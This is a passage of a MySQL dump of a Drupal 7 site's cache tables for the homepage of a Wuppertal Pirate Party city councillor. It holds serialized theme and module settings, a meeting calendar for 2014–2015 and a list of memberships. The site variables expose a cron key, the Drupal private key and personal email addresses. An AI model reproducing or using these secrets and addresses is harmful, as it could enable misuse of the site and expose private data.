";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}s:5:\"stark\";O:8:\"stdClass\":10:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}}s:9:\"filepaths\";a:34:{i:0;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"block\";s:8:\"filepath\";s:26:\"modules/block/block.module\";}i:1;a:3:{s:4:\"type\";s:5:\"theme\";s:4:\"name\";s:6:\"bartik\";s:8:\"filepath\";s:25:\"themes/bartik/bartik.info\";}i:2;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"color\";s:8:\"filepath\";s:26:\"modules/color/color.module\";}i:3;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"comment\";s:8:\"filepath\";s:30:\"modules/comment/comment.module\";}i:4;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"contact\";s:8:\"filepath\";s:30:\"modules/contact/contact.module\";}i:5;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:10:\"contextual\";s:8:\"filepath\";s:36:\"modules/contextual/contextual.module\";}i:6;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:9:\"dashboard\";s:8:\"filepath\";s:34:\"modules/dashboard/dashboard.module\";}i:7;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"dblog\";s:8:\"filepath\";s:26:\"modules/dblog/dblog.module\";}i:8;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"field\";s:8:\"filepath\";s:26:\"modules/field/field.module\";}i:9;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:17:\"field_sql_storage\";s:8:\"filepath\";s:64:\"modules/field/modules/field_sql_storage/field_sql_storage.module\";}i:10;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:8:\"field_ui\";s:8:\"filepath\";s:32:\"modules/field_ui/field_ui.module\";}i:11;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"file\";s:8:\"filepath\";s:24:\"modules/file/file.module\";}i:12;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"filter\";s:8:\"filepath\";s:28:\"modules/filter/filter.module\";}i:13;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"help\";s:8:\"filepath\";s:24:\"modules/help/help.module\";}i:14;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:5:\"image\";s:8:\"filepath\";s:26:\"modules/image/image.module\";}i:15;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"list\";s:8:\"filepath\";s:38:\"modules/field/modules/list/list.module\";}i:16;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"menu\";s:8:\"filepath\";s:24:\"modules/menu/menu.module\";}i:17;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"node\";s:8:\"filepath\";s:24:\"modules/node/node.module\";}i:18;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"number\";s:8:\"filepath\";s:42:\"modules/field/modules/number/number.module\";}i:19;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"options\";s:8:\"filepath\";s:44:\"modules/field/modules/options/options.module\";}i:20;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"overlay\";s:8:\"filepath\";s:30:\"modules/overlay/overlay.module\";}i:21;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"path\";s:8:\"filepath\";s:24:\"modules/path/path.module\";}i:22;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:3:\"rdf\";s:8:\"filepath\";s:22:\"modules/rdf/rdf.module\";}i:23;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"search\";s:8:\"filepath\";s:28:\"modules/search/search.module\";}i:24;a:3:{s:4:\"type\";s:5:\"theme\";s:4:\"name\";s:5:\"seven\";s:8:\"filepath\";s:23:\"themes/seven/seven.info\";}i:25;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:8:\"shortcut\";s:8:\"filepath\";s:32:\"modules/shortcut/shortcut.module\";}i:26;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:10:\"statistics\";s:8:\"filepath\";s:36:\"modules/statistics/statistics.module\";}i:27;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"system\";s:8:\"filepath\";s:28:\"modules/system/system.module\";}i:28;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:8:\"taxonomy\";s:8:\"filepath\";s:32:\"modules/taxonomy/taxonomy.module\";}i:29;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"text\";s:8:\"filepath\";s:38:\"modules/field/modules/text/text.module\";}i:30;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:7:\"toolbar\";s:8:\"filepath\";s:30:\"modules/toolbar/toolbar.module\";}i:31;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:6:\"update\";s:8:\"filepath\";s:28:\"modules/update/update.module\";}i:32;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:4:\"user\";s:8:\"filepath\";s:24:\"modules/user/user.module\";}i:33;a:3:{s:4:\"type\";s:6:\"module\";s:4:\"name\";s:8:\"standard\";s:8:\"filepath\";s:34:\"profiles/standard/standard.profile\";}}}',0,1426848142,1),('variables','a:41:{s:11:\"admin_theme\";s:5:\"seven\";s:9:\"clean_url\";s:1:\"0\";s:18:\"color_bartik_files\";a:2:{i:0;s:39:\"public://color/bartik-37adaa51/logo.png\";i:1;s:41:\"public://color/bartik-37adaa51/colors.css\";}s:17:\"color_bartik_logo\";s:39:\"public://color/bartik-37adaa51/logo.png\";s:20:\"color_bartik_palette\";a:9:{s:3:\"top\";s:7:\"#bf3707\";s:6:\"bottom\";s:7:\"#e47248\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}s:24:\"color_bartik_stylesheets\";a:1:{i:0;s:41:\"public://color/bartik-37adaa51/colors.css\";}s:12:\"comment_page\";i:0;s:8:\"cron_key\";s:43:\"W7bAGVcNKlW-D5Gz9Bq_VYipUTa7gwRZfmJTQhlGP3g\";s:9:\"cron_last\";i:1426848104;s:19:\"css_js_query_string\";s:6:\"njly4i\";s:21:\"date_default_timezone\";s:13:\"Europe/Berlin\";s:25:\"drupal_http_request_fails\";b:0;s:18:\"drupal_private_key\";s:43:\"-mxvGzud_FImMrA3ix94VS-GUqITKqi1h-ESzRGmO5o\";s:19:\"file_temporary_path\";s:4:\"/tmp\";s:22:\"filter_fallback_format\";s:10:\"plain_text\";s:15:\"install_profile\";s:8:\"standard\";s:12:\"install_task\";s:4:\"done\";s:12:\"install_time\";i:1415823880;s:16:\"maintenance_mode\";b:0;s:13:\"menu_expanded\";a:0:{}s:10:\"menu_masks\";a:34:{i:0;i:501;i:1;i:493;i:2;i:250;i:3;i:247;i:4;i:246;i:5;i:245;i:6;i:125;i:7;i:123;i:8;i:122;i:9;i:121;i:10;i:117;i:11;i:63;i:12;i:62;i:13;i:61;i:14;i:60;i:15;i:59;i:16;i:58;i:17;i:44;i:18;i:31;i:19;i:30;i:20;i:29;i:21;i:28;i:22;i:24;i:23;i:21;i:24;i:15;i:25;i:14;i:26;i:13;i:27;i:11;i:28;i:7;i:29;i:6;i:30;i:5;i:31;i:3;i:32;i:2;i:33;i:1;}s:16:\"node_admin_theme\";s:1:\"1\";s:14:\"node_cron_last\";s:10:\"1426238608\";s:17:\"node_options_page\";a:1:{i:0;s:6:\"status\";}s:19:\"node_submitted_page\";b:0;s:20:\"path_alias_whitelist\";a:0:{}s:20:\"site_default_country\";s:2:\"DE\";s:9:\"site_mail\";s:16:\"piratolli@t9s.de\";s:9:\"site_name\";s:14:\"www.ollital.de\";s:24:\"statistics_day_timestamp\";i:1426795203;s:21:\"theme_bartik_settings\";a:19:{s:11:\"toggle_logo\";i:1;s:11:\"toggle_name\";i:1;s:13:\"toggle_slogan\";i:1;s:24:\"toggle_node_user_picture\";i:1;s:27:\"toggle_comment_user_picture\";i:1;s:32:\"toggle_comment_user_verification\";i:1;s:14:\"toggle_favicon\";i:1;s:16:\"toggle_main_menu\";i:1;s:21:\"toggle_secondary_menu\";i:1;s:12:\"default_logo\";i:1;s:9:\"logo_path\";s:0:\"\";s:11:\"logo_upload\";s:0:\"\";s:15:\"default_favicon\";i:1;s:12:\"favicon_path\";s:0:\"\";s:14:\"favicon_upload\";s:0:\"\";s:6:\"scheme\";s:0:\"\";s:7:\"palette\";a:9:{s:3:\"top\";s:7:\"#bf3707\";s:6:\"bottom\";s:7:\"#e47248\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}s:5:\"theme\";s:6:\"bartik\";s:4:\"info\";a:12:{s:6:\"fields\";a:9:{s:3:\"top\";s:10:\"Header top\";s:6:\"bottom\";s:13:\"Header bottom\";s:2:\"bg\";s:15:\"Main background\";s:7:\"sidebar\";s:18:\"Sidebar background\";s:14:\"sidebarborders\";s:15:\"Sidebar borders\";s:6:\"footer\";s:17:\"Footer background\";s:11:\"titleslogan\";s:16:\"Title and slogan\";s:4:\"text\";s:10:\"Text color\";s:4:\"link\";s:10:\"Link color\";}s:7:\"schemes\";a:6:{s:7:\"default\";a:2:{s:5:\"title\";s:21:\"Blue Lagoon (default)\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#0779bf\";s:6:\"bottom\";s:7:\"#48a9e4\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}}s:9:\"firehouse\";a:2:{s:5:\"title\";s:9:\"Firehouse\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#cd2d2d\";s:6:\"bottom\";s:7:\"#cf3535\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f1f4f0\";s:14:\"sidebarborders\";s:7:\"#ededed\";s:6:\"footer\";s:7:\"#1f1d1c\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#d6121f\";}}s:3:\"ice\";a:2:{s:5:\"title\";s:3:\"Ice\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#d0d0d0\";s:6:\"bottom\";s:7:\"#c2c4c5\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#cccccc\";s:6:\"footer\";s:7:\"#24272c\";s:11:\"titleslogan\";s:7:\"#000000\";s:4:\"text\";s:7:\"#4a4a4a\";s:4:\"link\";s:7:\"#019dbf\";}}s:4:\"plum\";a:2:{s:5:\"title\";s:4:\"Plum\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4c1c58\";s:6:\"bottom\";s:7:\"#593662\";s:2:\"bg\";s:7:\"#fffdf7\";s:7:\"sidebar\";s:7:\"#edede7\";s:14:\"sidebarborders\";s:7:\"#e7e7e7\";s:6:\"footer\";s:7:\"#2c2c28\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#301313\";s:4:\"link\";s:7:\"#9d408d\";}}s:5:\"slate\";a:2:{s:5:\"title\";s:5:\"Slate\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4a4a4a\";s:6:\"bottom\";s:7:\"#4e4e4e\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#d0d0d0\";s:6:\"footer\";s:7:\"#161617\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0073b6\";}}s:0:\"\";a:2:{s:5:\"title\";s:6:\"Custom\";s:6:\"colors\";a:0:{}}}s:3:\"css\";a:1:{i:0;s:14:\"css/colors.css\";}s:4:\"copy\";a:1:{i:0;s:8:\"logo.png\";}s:9:\"gradients\";a:1:{i:0;a:3:{s:9:\"dimension\";a:4:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;}s:9:\"direction\";s:8:\"vertical\";s:6:\"colors\";a:2:{i:0;s:3:\"top\";i:1;s:6:\"bottom\";}}}s:4:\"fill\";a:0:{}s:6:\"slices\";a:0:{}s:12:\"blend_target\";s:7:\"#ffffff\";s:11:\"preview_css\";s:17:\"color/preview.css\";s:10:\"preview_js\";s:16:\"color/preview.js\";s:12:\"preview_html\";s:18:\"color/preview.html\";s:10:\"base_image\";s:14:\"color/base.png\";}}s:13:\"theme_default\";s:6:\"bartik\";s:17:\"update_last_check\";i:1426795207;s:30:\"update_last_email_notification\";i:1426795203;s:20:\"update_notify_emails\";a:1:{i:0;s:16:\"olli-graf@t9s.de\";}s:15:\"user_admin_role\";s:1:\"3\";s:13:\"user_pictures\";s:1:\"1\";s:23:\"user_picture_dimensions\";s:9:\"1024x1024\";s:22:\"user_picture_file_size\";s:3:\"800\";s:18:\"user_picture_style\";s:9:\"thumbnail\";s:13:\"user_register\";i:2;}',0,1426848118,1); /*!40000 ALTER TABLE `dpl_cache_bootstrap` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_field` -- DROP TABLE IF EXISTS `dpl_cache_field`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_field` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Generic cache table for caching things not separated out...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_field` -- LOCK TABLES `dpl_cache_field` WRITE; /*!40000 ALTER TABLE `dpl_cache_field` DISABLE KEYS */; INSERT INTO `dpl_cache_field` VALUES ('field:node:2','a:1:{s:4:\"body\";a:1:{s:3:\"und\";a:1:{i:0;a:5:{s:5:\"value\";s:138:\"Olli Graf\r\nStadtverordneter im Rat der Stadt Wuppertal\r\nMitglied der Piratenpartei.\r\nMitglied in der Fraktion Bündnis 90/Die Grünen.\r\n\r\n\";s:7:\"summary\";s:90:\"Homepage des Stadtverordneten Olli Graf im Rat der Stadt Wuppertal für die Piratenpartei.\";s:6:\"format\";s:13:\"filtered_html\";s:10:\"safe_value\";s:157:\"

                                Olli Graf
                                \nStadtverordneter im Rat der Stadt Wuppertal
                                \nMitglied der Piratenpartei.
                                \nMitglied in der Fraktion Bündnis 90/Die Grünen.

                                \n\";s:12:\"safe_summary\";s:98:\"

                                Homepage des Stadtverordneten Olli Graf im Rat der Stadt Wuppertal für die Piratenpartei.

                                \n\";}}}}',0,1423658947,1),('field:node:5','a:3:{s:4:\"body\";a:1:{s:3:\"und\";a:1:{i:0;a:5:{s:5:\"value\";s:1778:\"21.11.2014 Tag der Offenen Tür AIDS-Hilfe Wuppertal\r\n23.11.2014 Kreismitgliederversammlung\r\n26.11.2014 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n26.11.2014 Bürgerbegehren gegen den Verkauf des Carnaper Platzes\r\n01.12.2014 Filmpremiere – Dokumentation »Stigma ADHS« zum Thema ADHS bei Kindern\r\n03.12.2014 BV Elberfeld\r\n09.12.2014 BV Barmen\r\n15.12.2014 Ratssitzung\r\n19.12.2014 offiz. Eröffnung der Nordbahntrasse\r\n\r\nJanuar\r\n18.01.2015 Neujahrsempfang Bürgerverein Langerfeld und Förderverein der Gesamtschule Langerfeld\r\n28.01. 2015 BV Elberfeld\r\n\r\nFebruar\r\n09.02.2015 Gemeinsame Sondersitzung der Ausschüsse Finanzen,StaWiBau und Beteiligungssteuerung\r\n10.02.2015 Ratssondersitzung\r\n11.02.2015 Wuppertal 3.0\r\n24.02.2015 BV Barmen\r\n25.02.2015 BV Elberfeld\r\n\r\nMärz\r\n03.03.2015 Wuppertal 3.0\r\n09.03.2015 Ratssitzung\r\n24.03.2015 Nahverkehr neu denken: Das solidarische Bürgerticket\r\n25.03.2015 Wuppertal 3.0\r\n\r\nApril\r\n14.04.2015 Wuppertal 3.0\r\n22.04.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n28.04.2014 BV Barmen\r\n29.04.2015 BV Elberfeld\r\n\r\nMai\r\n06.05.2015 Wuppertal 3.0\r\n11.05.2015 Ratssitzung\r\n21.05.2015 Wuppertal 3.0\r\n30.05.2015 Wuppertal 3.0\r\n\r\nJuni\r\n03.06.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n09.06.2015 BV Barmen\r\n10.06.2015 BV Elberfeld\r\n22.06.2015 Ratssitzung\r\n29.06.2015 Beginn der Sommerferien\r\n\r\nJuli\r\n25./26.07.2015 BPT 2015.1 Würzburg\r\n\r\nAugust\r\n25.08.2015 BV Barmen\r\n27.08.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nSeptember\r\n07.09.2015 Ratssitzung\r\n\r\nJeden 2. und 4. Donnerstag eines Monats Stammtisch im Abgeordnetenbüro Wichlinghauser Str. 61\r\n\";s:7:\"summary\";s:0:\"\";s:6:\"format\";s:13:\"filtered_html\";s:10:\"safe_value\";s:2004:\"

                                21.11.2014 Tag der Offenen Tür AIDS-Hilfe Wuppertal
                                \n23.11.2014 Kreismitgliederversammlung
                                \n26.11.2014 Ausschuss Stadtentwicklung, Wirtschaft und Bauen
                                \n26.11.2014 Bürgerbegehren gegen den Verkauf des Carnaper Platzes
                                \n01.12.2014 Filmpremiere – Dokumentation »Stigma ADHS« zum Thema ADHS bei Kindern
                                \n03.12.2014 BV Elberfeld
                                \n09.12.2014 BV Barmen
                                \n15.12.2014 Ratssitzung
                                \n19.12.2014 offiz. Eröffnung der Nordbahntrasse

                                \n

                                Januar
                                \n18.01.2015 Neujahrsempfang Bürgerverein Langerfeld und Förderverein der Gesamtschule Langerfeld
                                \n28.01. 2015 BV Elberfeld

                                \n

                                Februar
                                \n09.02.2015 Gemeinsame Sondersitzung der Ausschüsse Finanzen,StaWiBau und Beteiligungssteuerung
                                \n10.02.2015 Ratssondersitzung
                                \n11.02.2015 Wuppertal 3.0
                                \n24.02.2015 BV Barmen
                                \n25.02.2015 BV Elberfeld

                                \n

                                März
                                \n03.03.2015 Wuppertal 3.0
                                \n09.03.2015 Ratssitzung
                                \n24.03.2015 Nahverkehr neu denken: Das solidarische Bürgerticket
                                \n25.03.2015 Wuppertal 3.0

                                \n

                                April
                                \n14.04.2015 Wuppertal 3.0
                                \n22.04.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen
                                \n28.04.2014 BV Barmen
                                \n29.04.2015 BV Elberfeld

                                \n

                                Mai
                                \n06.05.2015 Wuppertal 3.0
                                \n11.05.2015 Ratssitzung
                                \n21.05.2015 Wuppertal 3.0
                                \n30.05.2015 Wuppertal 3.0

                                \n

                                Juni
                                \n03.06.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen
                                \n09.06.2015 BV Barmen
                                \n10.06.2015 BV Elberfeld
                                \n22.06.2015 Ratssitzung
                                \n29.06.2015 Beginn der Sommerferien

                                \n

                                Juli
                                \n25./26.07.2015 BPT 2015.1 Würzburg

                                \n

                                August
                                \n25.08.2015 BV Barmen
                                \n27.08.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen

                                \n

                                September
                                \n07.09.2015 Ratssitzung

                                \n

                                Jeden 2. und 4. Donnerstag eines Monats Stammtisch im Abgeordnetenbüro Wichlinghauser Str. 61

                                \n\";s:12:\"safe_summary\";s:0:\"\";}}}s:10:\"field_tags\";a:0:{}s:11:\"field_image\";a:0:{}}',0,1426238608,1),('field:node:6','a:3:{s:4:\"body\";a:1:{s:3:\"und\";a:1:{i:0;a:5:{s:5:\"value\";s:305:\"Ich bin Mitglied in folgenden Organisationen:\r\n\r\n
                                  \r\n
                                • ASV -Allgemeiner Sportverein Wuppertal e.V.
                                • \r\n
                                • ADAC - Allgemeiner Deutscher Automobilclub e.V.
                                • \r\n
                                • Musikpiraten e.V.
                                • \r\n
                                • NAG - Neue Assekuranz Gerwerkschaft
                                • \r\n
                                • Piratenpartei NRW
                                • \r\n
                                • piKo NRW e.V.
                                • \r\n
                                \";s:7:\"summary\";s:0:\"\";s:6:\"format\";s:13:\"filtered_html\";s:10:\"safe_value\";s:296:\"

                                Ich bin Mitglied in folgenden Organisationen:

                                \n
                                • ASV -Allgemeiner Sportverein Wuppertal e.V.
                                • \n
                                • ADAC - Allgemeiner Deutscher Automobilclub e.V.
                                • \n
                                • Musikpiraten e.V.
                                • \n
                                • NAG - Neue Assekuranz Gerwerkschaft
                                • \n
                                • Piratenpartei NRW
                                • \n
                                • piKo NRW e.V.
                                • \n
                                \";s:12:\"safe_summary\";s:0:\"\";}}}s:10:\"field_tags\";a:0:{}s:11:\"field_image\";a:0:{}}',0,1423658880,1),('field:user:1','a:0:{}',0,1423658870,1),('field:user:6','a:0:{}',0,1426848104,1),('field_info:bundle:comment:comment_node_article','a:2:{s:9:\"instances\";a:1:{s:12:\"comment_body\";a:13:{s:5:\"label\";s:7:\"Comment\";s:8:\"settings\";a:2:{s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:8:\"required\";b:1;s:7:\"display\";a:1:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:6:\"weight\";i:0;s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:6:\"widget\";a:4:{s:4:\"type\";s:13:\"text_textarea\";s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"weight\";i:0;s:6:\"module\";s:4:\"text\";}s:11:\"description\";s:0:\"\";s:2:\"id\";s:1:\"3\";s:8:\"field_id\";s:1:\"1\";s:10:\"field_name\";s:12:\"comment_body\";s:11:\"entity_type\";s:7:\"comment\";s:6:\"bundle\";s:20:\"comment_node_article\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}}s:6:\"fields\";a:1:{i:0;a:16:{s:12:\"entity_types\";a:1:{i:0;s:7:\"comment\";}s:12:\"translatable\";s:1:\"0\";s:8:\"settings\";a:0:{}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:23:\"field_data_comment_body\";a:2:{s:5:\"value\";s:18:\"comment_body_value\";s:6:\"format\";s:19:\"comment_body_format\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:27:\"field_revision_comment_body\";a:2:{s:5:\"value\";s:18:\"comment_body_value\";s:6:\"format\";s:19:\"comment_body_format\";}}}}}s:12:\"foreign keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}s:2:\"id\";s:1:\"1\";s:10:\"field_name\";s:12:\"comment_body\";s:4:\"type\";s:9:\"text_long\";s:6:\"module\";s:4:\"text\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:2:{s:5:\"value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not 